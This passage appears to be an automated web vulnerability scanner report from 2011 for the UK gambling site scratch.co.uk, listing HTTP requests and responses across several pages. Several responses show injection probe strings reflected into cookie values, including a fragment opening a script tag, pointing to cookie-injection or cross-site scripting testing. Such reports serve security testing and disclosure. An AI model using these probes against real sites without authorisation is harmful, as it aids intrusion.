HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:29:36 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG88308%22%3E Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:36 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 16996 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /invite-friend/ |
GET /invite-friend/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:25:37 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:37 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:37 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 15141 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /invite-friend/ |
GET /invite-friend/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:29:32 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:33 GMT; path=/ Set-Cookie: currency=GBPd0b24%22%3E Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 15139 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /invite-friend/ |
GET /invite-friend/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:28:49 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG61860%22%3E Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:28:50 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 14987 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /over-18/ |
GET /over-18/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:26:11 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:12 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:12 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 10735 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /over-18/ |
GET /over-18/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:30:43 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:44 GMT; path=/ Set-Cookie: currency=GBP3a5e9%22%3E Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 10733 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /over-18/ |
GET /over-18/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:30:00 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENGb2f0a%22%3E Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 10735 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /problem-gambling/ |
GET /problem-gambling/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:26:06 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:06 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:06 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 13878 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /problem-gambling/ |
GET /problem-gambling/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:30:38 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:39 GMT; path=/ Set-Cookie: currency=GBP46cdc%22%3E Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 13769 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /problem-gambling/ |
GET /problem-gambling/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:29:40 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG6c926%22%3E Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:40 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 14032 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /promotions/ |
GET /promotions/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:25:31 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:32 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:32 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 14145 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /promotions/ |
GET /promotions/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:29:41 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:41 GMT; path=/ Set-Cookie: currency=GBPb24c5%22%3E Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 13985 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /promotions/ |
GET /promotions/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:28:54 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG1efd1%22%3E Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:28:54 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 13884 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /promotions/argos/ |
GET /promotions/argos/ HTTP/1.1 Host: scratch.co.uk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://scratch.co.uk/ Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:58:42 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=v7qe830mrf Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:58:42 GMT; path=/ Set-Cookie: currency=USD737fc%22 Set-Cookie: neogamesemail=deleted%7E Content-Type: text/html Content-Length: 11164 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /promotions/argos/ |
GET /promotions/argos/ HTTP/1.1 Host: scratch.co.uk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://scratch.co.uk/ Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:58:45 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=f6g2ell6no Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:58:45 GMT; path=/ Set-Cookie: currency=934e5%22%3E Set-Cookie: neogamesemail=deleted%7E Content-Type: text/html Content-Length: 11246 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /promotions/argos/ |
GET /promotions/argos/ HTTP/1.1 Host: scratch.co.uk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://scratch.co.uk/ Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:58:44 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=hvmdk8ph4m Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:58:44 GMT; path=/ Set-Cookie: currency=USD737fc%22 Set-Cookie: neogamesemail=deleted%7E Content-Type: text/html Content-Length: 11164 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /promotions/argos/ |
GET /promotions/argos/ HTTP/1.1 Host: scratch.co.uk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://scratch.co.uk/ Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:58:43 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=n43q1ra7uk Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG6154e%3E%3Cscript Set-Cookie: currency=USD737fc%22 Set-Cookie: neogamesemail=deleted%7E Content-Type: text/html Content-Length: 11466 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /terms/ |
GET /terms/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:26:24 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:28 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:28 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 45926 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /terms/ |
GET /terms/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:30:48 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:48 GMT; path=/ Set-Cookie: currency=GBP252c4%22%3E Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 46031 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /terms/ |
GET /terms/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:30:40 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG93c11%22%3E Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:40 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 45926 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /vis-club/ |
GET /vis-club/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:25:36 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:36 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:36 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 16370 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /vis-club/ |
GET /vis-club/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:30:07 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:09 GMT; path=/ Set-Cookie: currency=GBP49be4%22%3E Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 16368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /vis-club/ |
GET /vis-club/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:29:21 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENGaa1c0%22%3E Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:22 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 16109 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /winners/ |
GET /winners/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:26:03 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:04 GMT; path=/ Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:04 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 28322 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /winners/ |
GET /winners/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:30:22 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:22 GMT; path=/ Set-Cookie: currency=GBP3a954%22%3E Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 28427 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | /winners/ |
GET /winners/ HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
